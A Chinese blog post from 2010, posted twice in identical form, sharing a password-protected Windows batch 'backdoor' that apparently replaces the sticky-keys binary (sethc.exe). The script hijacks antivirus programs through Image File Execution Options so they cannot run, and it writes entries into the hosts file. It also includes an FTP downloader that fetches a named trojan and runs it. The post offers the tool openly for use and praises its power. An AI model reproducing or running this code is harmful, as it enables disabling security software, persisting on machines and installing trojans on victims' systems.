超强bat后门
作者:admin 日期:2010-02-07
神刀网
密码是:shendao代码如下:
//////////////////////////
@echo off
:begin
title %systemroot%\system32\cmd.exe
cls
echo Microsoft Windows [版本 5.2.3790]
echo (C) 版权所有 1985-2003 Microsoft Corp.
echo.
set /p pwd=C:\Documents and Settings\Administrator^>
if %pwd%==shendao (goto loginsuc) else goto begin
:loginsuc
cls
echo.
echo.
echo login success`
echo 登陆成功`
ping -n 2 127.1>nul
:then
cls
echo.
echo sethc.exe[20090611] - BY:shendao
echo=============================================================
echo.
echo 1.hosts
echo.
echo 2.映像劫持
echo.
echo 3.control
echo.
echo 4.下载者,downloader
echo.
echo 5.regedt32
echo.
echo 6.explorer
echo.
echo 7.cmd
echo.
echo 8.taskmgr
echo.
echo 9.about
echo.
echo 0.返回首页
:Choice2
set choice2=
set /p choice2=请选择,然后按回车.:
IF NOT "%Choice2%"=="" SET Choice2=%Choice2:~0,1%
if /i "%choice2%"=="1" goto hosts
if /i "%choice2%"=="2" goto inkc
if /i "%choice2%"=="3" goto control
if /i "%choice2%"=="4" goto downloader
if /i "%choice2%"=="5" goto regedt32
if /i "%choice2%"=="6" goto explorer
if /i "%choice2%"=="7" goto cmd
if /i "%choice2%"=="8" goto taskmgr
if /i "%choice2%"=="9" goto about
if /i "%Choice2%"=="0" goto begin
echo 选择无效,请重新输入
echo.
:inkc
cls
echo.
echo.
echo please type in the programme name you want to fail.
echo.
echo 请输入一个程序的文件名,如"1.exe",它将会被映像劫持到rundll32.exe.
echo.
echo If you type in "360safeTray.exe" then this programme will not run success.
echo example:
echo [安全工具] IceSword.exe,Wsyscheck.exe,
echo [kingsoft] kav32.exe,kwatch.exe.
echo [Rising] RavMonD.exe,RavTask.exe,RSTray.exe,CCenter.exe.
echo [kaspersky] kav.exe
echo [360] 360Safe.exe,360safeTray.exe,修复工具.exe
set /p inkcname=type in here:
echo Windows Registry Editor Version 5.00>inkc.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%inkcname%]>>inkc.reg
echo "Debugger"="rundll32.exe">>inkc.reg
::echo "Debugger"="%inkcdir%">>inkc.reg
regedit /s inkc.reg
del inkc.reg
echo.
echo success...
ping -n 2 127.1>nul
echo.
set choice=
set /p choice=back to the index page ?[y/n]:
IF NOT "%Choice%"=="" SET Choice=%Choice:~0,1%
if /i "%choice%"=="y" goto then
if /i "%choice%"=="n" goto inkc
if /i "%choice%"=="1" goto then
if /i "%choice%"=="2" goto inkc
goto inkc
:control
cls
echo.
echo sethc.exe[20090611] - BY:shendao
echo=============================================================
echo.
echo 1.shutdown,关机
echo.
echo 2.restart,重启
echo.
echo 3.log off,注销
echo.
echo 4.task,计划关机
echo.
echo 5.ntbackup
echo.
echo 6.services.msc
echo.
echo 7.gpedit.msc
echo.
echo 8.
echo.
echo 9.
echo.
echo 0.返回首页
:Choice2
set choice2=
set /p choice2=请选择,然后按回车.:
IF NOT "%Choice2%"=="" SET Choice2=%Choice2:~0,1%
if /i "%choice2%"=="1" goto shutdown
if /i "%choice2%"=="2" goto restart
if /i "%choice2%"=="3" goto logoff
if /i "%choice2%"=="4" goto shutask
if /i "%choice2%"=="5" goto ntbackup
if /i "%choice2%"=="6" goto servicesmsc
if /i "%choice2%"=="7" goto gpeditmsc
if /i "%choice2%"=="8" goto
if /i "%choice2%"=="9" goto
if /i "%Choice2%"=="0" goto loginsuc
echo 选择无效,请重新输入
echo.
:shutdown
set /p choice4=确定?[y/n]:
IF NOT "%Choice4%"=="" SET Choice4=%Choice4:~0,1%
if /i "%choice4%"=="y" goto shutdownsure
if /i "%choice4%"=="n" goto control
if /i "%choice4%"=="1" goto shutdownsure
if /i "%choice4%"=="2" goto control
:shutdownsure
shutdown -s
:shutcancel
set choice5=
set /p choice5=计算机将在30后关闭/重启,输入c取消,n返回.
IF NOT "%Choice5%"=="" SET Choice5=%Choice5:~0,1%
if /i "%choice5%"=="c" goto shutdowncancel
if /i "%choice5%"=="n" goto control
if /i "%choice5%"=="1" goto shutdowncancel
if /i "%choice5%"=="2" goto control
:shutdowncancel
shutdown -a
echo 计划关机已经取消.
ping -n 2 127.1>nul
goto control
:restart
shutdown -r
goto shutcancel
:logoff
:shutdown
set /p choice4=确定? 此操作没有等待时间.[y/n]:
IF NOT "%Choice4%"=="" SET Choice4=%Choice4:~0,1%
if /i "%choice4%"=="y" goto logoffsure
if /i "%choice4%"=="n" goto control
if /i "%choice4%"=="1" goto logoffsure
if /i "%choice4%"=="2" goto control
:logoffsure
shutdown -l
goto control
:shutask
shutdown -i
goto control
:ntbackup
ntbackup
goto control
:servicesmsc
services.msc
goto control
:gpeditmsc
gpedit.msc
goto control
:hosts
cls
echo.
echo.
echo this programme is used to add domain2ip in windows hosts document.
echo please type in the domain you want to add to the hosts
set /p choicehostsdomain=请输入需要添加的hosts解析的域名:
echo.
echo please type in the IP address.
set /p choicehostsip=请输入该域名需要被解析到的IP地址:
attrib %systemroot%\system32\drivers\etc\hosts -s -h -r
echo %choicehostsip% %choicehostsdomain%>>%systemroot%\system32\drivers\etc\hosts
attrib %systemroot%\system32\drivers\etc\hosts +r
echo.
ping -n 2 127.1>nul
echo written successfully.
echo 已成功写入.
ping -n 2 127.1>nul
echo.
echo then will view the hosts document's detail......
echo 下面将显示hosts文件的内容.....
ping -n 4 127.1>nul
echo.
type %systemroot%\system32\drivers\etc\hosts
echo.
echo press anykey to go back....
echo 按任意键返回....
pause >nul
goto then
:nc
goto then
:ca
goto then
:scan
goto then
:downloader
cls
echo.
echo.
echo.
echo sethc.exe[20090611] - BY:shendao
echo=============================================================
echo please type in this order:
echo ftp host,ftp user,ftp password,full name[full name,include ".exe"]
set /p choiceip=请输入FTP服务器地址:
set /p choiceuser=请输入FTP账户名称:
set /p choicepass=请输入FTP密码:
set /p choicename=请输入木马全称[包括".exe"]:
echo open %choiceip%>downloader.txt
echo %choiceuser%>>downloader.txt
echo %choicepass%>>downloader.txt
echo binary>>downloader.txt
echo get %choicename%>>downloader.txt
echo bye>>downloader.txt
pause
ftp -s:downloader.txt
del downloader.txt
echo.
echo press "ENTER" to continue...
echo 回车执行下载下来的程序...
echo.
pause >nul
start %choicename%
echo.
echo %choicename% has been run....
echo 已执行%choicename%....
echo.
set choice=
echo.
echo del the %choicename% ?
set /p choice=删除掉已下载的%choicename%吗?[y/n]:
IF NOT "%Choice%"=="" SET Choice=%Choice:~0,1%
if /i "%choice%"=="y" goto delserver
if /i "%choice%"=="n" goto nodelserver
if /i "%choice%"=="1" goto delserver
if /i "%choice%"=="2" goto nodelserver
:delserver
del %choicename%
echo.
echo deleted.
echo 已删除%choicename%.
ping -n 3 127.1>nul
echo.
echo then will go to the index page.....
echo 下面将跳转到首页.....
ping -n 3 127.1>nul
goto then
:nodelserver
echo.
echo not del the %choicename%...呵`~呵`~
echo 已跳过%choicename%的删除...
ping -n 3 127.1>nul
echo.
echo then will go to the index page.....
echo 下面将跳转到首页.....
ping -n 3 127.1>nul
goto then
:regedt32
start regedt32.exe
goto then
:explorer
start explorer.exe
goto then
:cmd
start cmd.exe
goto then
:taskmgr
start taskmgr.exe
goto then
:about
cls
echo.
echo Wscript.Sleep WScript.Arguments(0) >%tmp%\sleep.vbs
ping -n 2 127.1>nul
echo [shendao] - nhs8.com
echo Wscript.Sleep WScript.Arguments(0) >%tmp%\sleep.vbs
ping -n 2 127.1>nul
echo rule is a shit
ping -n 2 127.1>nul
echo url:
ping -n 2 127.1>nul
echo http://www.nhs8.com
echo.
ping -n 2 127.1>nul
set choice=
set /p choice=访问主页否?[y/n]:
IF NOT "%Choice%"=="" SET Choice=%Choice:~0,1%
if /i "%choice%"=="y" goto visit
if /i "%choice%"=="n" goto then
if /i "%choice%"=="1" goto visit
if /i "%choice%"=="2" goto then
ping -n 3 127.1>nul
:visit
START IEXPLORE http://www.7747.net
ping -n 4 127.1>nul
goto then
pause
////////////////////////////////////
进去后先输入密码。功能甚是强大,自己慢慢研究
密码是:shendao代码如下:
//////////////////////////
@echo off
:begin
title %systemroot%\system32\cmd.exe
cls
echo Microsoft Windows [版本 5.2.3790]
echo (C) 版权所有 1985-2003 Microsoft Corp.
echo.
set /p pwd=C:\Documents and Settings\Administrator^>
if %pwd%==shendao (goto loginsuc) else goto begin
:loginsuc
cls
echo.
echo.
echo login success`
echo 登陆成功`
ping -n 2 127.1>nul
:then
cls
echo.
echo sethc.exe[20090611] - BY:shendao
echo=============================================================
echo.
echo 1.hosts
echo.
echo 2.映像劫持
echo.
echo 3.control
echo.
echo 4.下载者,downloader
echo.
echo 5.regedt32
echo.
echo 6.explorer
echo.
echo 7.cmd
echo.
echo 8.taskmgr
echo.
echo 9.about
echo.
echo 0.返回首页
:Choice2
set choice2=
set /p choice2=请选择,然后按回车.:
IF NOT "%Choice2%"=="" SET Choice2=%Choice2:~0,1%
if /i "%choice2%"=="1" goto hosts
if /i "%choice2%"=="2" goto inkc
if /i "%choice2%"=="3" goto control
if /i "%choice2%"=="4" goto downloader
if /i "%choice2%"=="5" goto regedt32
if /i "%choice2%"=="6" goto explorer
if /i "%choice2%"=="7" goto cmd
if /i "%choice2%"=="8" goto taskmgr
if /i "%choice2%"=="9" goto about
if /i "%Choice2%"=="0" goto begin
echo 选择无效,请重新输入
echo.
:inkc
cls
echo.
echo.
echo please type in the programme name you want to fail.
echo.
echo 请输入一个程序的文件名,如"1.exe",它将会被映像劫持到rundll32.exe.
echo.
echo If you type in "360safeTray.exe" then this programme will not run success.
echo example:
echo [安全工具] IceSword.exe,Wsyscheck.exe,
echo [kingsoft] kav32.exe,kwatch.exe.
echo [Rising] RavMonD.exe,RavTask.exe,RSTray.exe,CCenter.exe.
echo [kaspersky] kav.exe
echo [360] 360Safe.exe,360safeTray.exe,修复工具.exe
set /p inkcname=type in here:
echo Windows Registry Editor Version 5.00>inkc.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%inkcname%]>>inkc.reg
echo "Debugger"="rundll32.exe">>inkc.reg
::echo "Debugger"="%inkcdir%">>inkc.reg
regedit /s inkc.reg
del inkc.reg
echo.
echo success...
ping -n 2 127.1>nul
echo.
set choice=
set /p choice=back to the index page ?[y/n]:
IF NOT "%Choice%"=="" SET Choice=%Choice:~0,1%
if /i "%choice%"=="y" goto then
if /i "%choice%"=="n" goto inkc
if /i "%choice%"=="1" goto then
if /i "%choice%"=="2" goto inkc
goto inkc
:control
cls
echo.
echo sethc.exe[20090611] - BY:shendao
echo=============================================================
echo.
echo 1.shutdown,关机
echo.
echo 2.restart,重启
echo.
echo 3.log off,注销
echo.
echo 4.task,计划关机
echo.
echo 5.ntbackup
echo.
echo 6.services.msc
echo.
echo 7.gpedit.msc
echo.
echo 8.
echo.
echo 9.
echo.
echo 0.返回首页
:Choice2
set choice2=
set /p choice2=请选择,然后按回车.:
IF NOT "%Choice2%"=="" SET Choice2=%Choice2:~0,1%
if /i "%choice2%"=="1" goto shutdown
if /i "%choice2%"=="2" goto restart
if /i "%choice2%"=="3" goto logoff
if /i "%choice2%"=="4" goto shutask
if /i "%choice2%"=="5" goto ntbackup
if /i "%choice2%"=="6" goto servicesmsc
if /i "%choice2%"=="7" goto gpeditmsc
if /i "%choice2%"=="8" goto
if /i "%choice2%"=="9" goto
if /i "%Choice2%"=="0" goto loginsuc
echo 选择无效,请重新输入
echo.
:shutdown
set /p choice4=确定?[y/n]:
IF NOT "%Choice4%"=="" SET Choice4=%Choice4:~0,1%
if /i "%choice4%"=="y" goto shutdownsure
if /i "%choice4%"=="n" goto control
if /i "%choice4%"=="1" goto shutdownsure
if /i "%choice4%"=="2" goto control
:shutdownsure
shutdown -s
:shutcancel
set choice5=
set /p choice5=计算机将在30后关闭/重启,输入c取消,n返回.
IF NOT "%Choice5%"=="" SET Choice5=%Choice5:~0,1%
if /i "%choice5%"=="c" goto shutdowncancel
if /i "%choice5%"=="n" goto control
if /i "%choice5%"=="1" goto shutdowncancel
if /i "%choice5%"=="2" goto control
:shutdowncancel
shutdown -a
echo 计划关机已经取消.
ping -n 2 127.1>nul
goto control
:restart
shutdown -r
goto shutcancel
:logoff
:shutdown
set /p choice4=确定? 此操作没有等待时间.[y/n]:
IF NOT "%Choice4%"=="" SET Choice4=%Choice4:~0,1%
if /i "%choice4%"=="y" goto logoffsure
if /i "%choice4%"=="n" goto control
if /i "%choice4%"=="1" goto logoffsure
if /i "%choice4%"=="2" goto control
:logoffsure
shutdown -l
goto control
:shutask
shutdown -i
goto control
:ntbackup
ntbackup
goto control
:servicesmsc
services.msc
goto control
:gpeditmsc
gpedit.msc
goto control
:hosts
cls
echo.
echo.
echo this programme is used to add domain2ip in windows hosts document.
echo please type in the domain you want to add to the hosts
set /p choicehostsdomain=请输入需要添加的hosts解析的域名:
echo.
echo please type in the IP address.
set /p choicehostsip=请输入该域名需要被解析到的IP地址:
attrib %systemroot%\system32\drivers\etc\hosts -s -h -r
echo %choicehostsip% %choicehostsdomain%>>%systemroot%\system32\drivers\etc\hosts
attrib %systemroot%\system32\drivers\etc\hosts +r
echo.
ping -n 2 127.1>nul
echo written successfully.
echo 已成功写入.
ping -n 2 127.1>nul
echo.
echo then will view the hosts document's detail......
echo 下面将显示hosts文件的内容.....
ping -n 4 127.1>nul
echo.
type %systemroot%\system32\drivers\etc\hosts
echo.
echo press anykey to go back....
echo 按任意键返回....
pause >nul
goto then
:nc
goto then
:ca
goto then
:scan
goto then
:downloader
cls
echo.
echo.
echo.
echo sethc.exe[20090611] - BY:shendao
echo=============================================================
echo please type in this order:
echo ftp host,ftp user,ftp password,full name[full name,include ".exe"]
set /p choiceip=请输入FTP服务器地址:
set /p choiceuser=请输入FTP账户名称:
set /p choicepass=请输入FTP密码:
set /p choicename=请输入木马全称[包括".exe"]:
echo open %choiceip%>downloader.txt
echo %choiceuser%>>downloader.txt
echo %choicepass%>>downloader.txt
echo binary>>downloader.txt
echo get %choicename%>>downloader.txt
echo bye>>downloader.txt
pause
ftp -s:downloader.txt
del downloader.txt
echo.
echo press "ENTER" to continue...
echo 回车执行下载下来的程序...
echo.
pause >nul
start %choicename%
echo.
echo %choicename% has been run....
echo 已执行%choicename%....
echo.
set choice=
echo.
echo del the %choicename% ?
set /p choice=删除掉已下载的%choicename%吗?[y/n]:
IF NOT "%Choice%"=="" SET Choice=%Choice:~0,1%
if /i "%choice%"=="y" goto delserver
if /i "%choice%"=="n" goto nodelserver
if /i "%choice%"=="1" goto delserver
if /i "%choice%"=="2" goto nodelserver
:delserver
del %choicename%
echo.
echo deleted.
echo 已删除%choicename%.
ping -n 3 127.1>nul
echo.
echo then will go to the index page.....
echo 下面将跳转到首页.....
ping -n 3 127.1>nul
goto then
:nodelserver
echo.
echo not del the %choicename%...呵`~呵`~
echo 已跳过%choicename%的删除...
ping -n 3 127.1>nul
echo.
echo then will go to the index page.....
echo 下面将跳转到首页.....
ping -n 3 127.1>nul
goto then
:regedt32
start regedt32.exe
goto then
:explorer
start explorer.exe
goto then
:cmd
start cmd.exe
goto then
:taskmgr
start taskmgr.exe
goto then
:about
cls
echo.
echo Wscript.Sleep WScript.Arguments(0) >%tmp%\sleep.vbs
ping -n 2 127.1>nul
echo [shendao] - nhs8.com
echo Wscript.Sleep WScript.Arguments(0) >%tmp%\sleep.vbs
ping -n 2 127.1>nul
echo rule is a shit
ping -n 2 127.1>nul
echo url:
ping -n 2 127.1>nul
echo http://www.nhs8.com
echo.
ping -n 2 127.1>nul
set choice=
set /p choice=访问主页否?[y/n]:
IF NOT "%Choice%"=="" SET Choice=%Choice:~0,1%
if /i "%choice%"=="y" goto visit
if /i "%choice%"=="n" goto then
if /i "%choice%"=="1" goto visit
if /i "%choice%"=="2" goto then
ping -n 3 127.1>nul
:visit
START IEXPLORE http://www.7747.net
ping -n 4 127.1>nul
goto then
pause
////////////////////////////////////
进去后先输入密码。功能甚是强大,自己慢慢研究
评论: 0 | 查看次数: 7277